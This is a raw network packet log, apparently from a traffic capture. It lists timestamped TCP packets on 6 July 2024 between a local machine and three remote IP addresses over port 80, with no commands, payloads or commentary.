                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.362961054 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.362972021 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.362982035 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.362993002 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.362999916 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.363004923 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.363018036 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.363023043 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.363032103 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.363042116 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.363060951 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.363085985 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.363210917 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.363260984 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.363293886 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.363306999 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.363318920 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.363332033 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.363343954 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.363344908 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.363357067 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.363373995 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.363393068 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.363416910 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.441716909 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.442027092 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.442037106 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.442048073 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.442058086 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.442070007 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.442080021 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.442176104 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.442181110 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.442181110 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.442188025 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.442199945 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.442215919 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.442224979 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.442235947 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.442250013 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.442266941 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.442446947 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.442459106 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.442468882 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.442478895 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.442490101 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.442504883 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.442507029 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.442531109 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.442550898 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.442590952 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.442601919 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.442611933 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.442621946 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.442634106 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.442642927 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.442648888 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.442667961 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.442679882 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.442701101 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.508579016 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.508603096 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.508616924 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.508646965 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.508665085 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.508713961 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.508725882 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.508755922 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.508784056 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.509054899 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.509078026 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.509090900 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.509108067 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.509120941 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.509141922 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.509206057 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.509217978 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.509228945 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.509263039 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.509288073 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.509335995 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.509350061 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.509361982 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.509392023 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.509421110 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.509605885 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.509654999 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.509677887 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.509690046 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.509731054 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.509761095 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.509773970 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.509814024 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.510011911 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.510060072 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.510086060 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.510097027 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.510138988 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.510170937 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.510181904 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.510193110 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.510226965 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.510246038 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.510411024 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.510461092 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.510466099 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.510478020 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.510514021 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.510538101 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.510584116 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:12.578766108 CEST4973480192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:12.583605051 CEST8049734188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:12.583743095 CEST4973480192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:12.583743095 CEST4973480192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:12.588598967 CEST8049734188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:13.234579086 CEST8049734188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:13.235340118 CEST8049734188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:13.235395908 CEST4973480192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:13.239098072 CEST4973480192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:13.240109921 CEST4973580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:13.244877100 CEST8049735188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:13.245038986 CEST4973580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:13.245085001 CEST4973580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:13.250045061 CEST8049735188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:13.250129938 CEST4973580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:13.254908085 CEST8049735188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:13.965997934 CEST8049735188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:13.966598034 CEST8049735188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:13.966774940 CEST4973580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:13.969621897 CEST4973580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:13.970268011 CEST4973680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:13.975030899 CEST8049736188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:13.975132942 CEST4973680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:13.975198030 CEST4973680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:13.980432987 CEST8049736188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:13.980520010 CEST4973680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:13.985301018 CEST8049736188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:14.809854984 CEST8049736188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:14.810524940 CEST8049736188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:14.810607910 CEST4973680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:14.820353985 CEST4973680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:14.847356081 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:14.852451086 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:14.852588892 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:14.852607965 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:14.858774900 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.417437077 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.417449951 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.417468071 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.417480946 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.417495012 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.417506933 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.417521000 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.417526007 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.417532921 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.417546034 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.417553902 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.417553902 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.417587042 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.417612076 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.419015884 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.422744989 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.422756910 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.422769070 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.422781944 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.422844887 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.422844887 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.504173040 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.504184008 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.504194975 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.504286051 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.504314899 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.504338026 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.504348993 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.504435062 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.504448891 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.504461050 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.504530907 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.505312920 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.505371094 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.505381107 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.505594015 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.505616903 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.505629063 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.505655050 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.505656004 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.505681038 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.506274939 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.506287098 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.506299973 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.506339073 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.506350994 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.506362915 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.507210016 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.507222891 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.507235050 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.507244110 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.507282019 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.507308006 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.509172916 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.509200096 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.509241104 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.511663914 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.591330051 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.591460943 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.591476917 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.591490984 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.591502905 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.591502905 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.591527939 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.591716051 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.591728926 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.591742039 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.591753960 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.591764927 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.591777086 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.591779947 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.591799021 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.591815948 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.591876030 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.591887951 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.591900110 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.591924906 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.592330933 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.592389107 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.592401981 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.592434883 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.592439890 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.592798948 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.592859030 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.592869997 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.592881918 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.592910051 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.592928886 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.593018055 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.593034029 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.593046904 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.593059063 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.593070030 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.593100071 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.593199015 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.593836069 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.593847990 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.593858957 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.593883038 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.593921900 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.594016075 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.594028950 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.594039917 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.594052076 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.594067097 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.594085932 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.594700098 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.594715118 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.594727993 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.594758034 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.594835043 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.594847918 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.594858885 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.594872952 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.594885111 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.594913960 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.594989061 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.595001936 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.595021963 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.595670938 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.599697113 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.632497072 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.632518053 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.632530928 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.632576942 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.678183079 CEST8049739192.3.140.185192.168.2.4
